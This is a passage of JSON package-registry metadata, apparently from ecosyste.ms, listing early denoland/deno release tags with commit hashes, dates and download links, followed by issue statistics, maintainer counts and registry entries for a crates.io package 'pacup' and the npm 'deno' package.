/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:51:48.009Z","dependent_packages_count":0,"downloads":563,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":89.40095122018273,"dependent_repos_count":29.318292202377133,"dependent_packages_count":33.81230354737315,"stargazers_count":0.039405075007102074,"forks_count":0.09805448897116098,"average":30.533801306782255},"purl":"pkg:cargo/pacup","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/pacup","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/pacup","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/pacup/dependencies","status":"removed","funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/pacup/codemeta","maintainers":[{"uuid":"193057","login":"TylerJerme","name":null,"email":null,"url":"https://github.com/TylerJerme","packages_count":4,"html_url":"https://crates.io/users/TylerJerme","role":null,"created_at":"2023-01-11T08:26:39.427Z","updated_at":"2023-01-11T08:26:39.427Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/TylerJerme/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":1607766,"name":"deno","ecosystem":"npm","description":"A modern runtime for JavaScript and TypeScript.","homepage":"https://deno.com","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":["runtime","typescript"],"namespace":null,"versions_count":104,"first_release_published_at":"2018-05-31T07:10:15.467Z","latest_release_published_at":"2026-08-27T17:36:36.711Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T22:56:23.403Z","created_at":"2022-04-09T11:36:30.830Z","updated_at":"2026-09-08T00:48:28.790Z","registry_url":"https://www.npmjs.com/package/deno","install_command":"npm install deno","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for 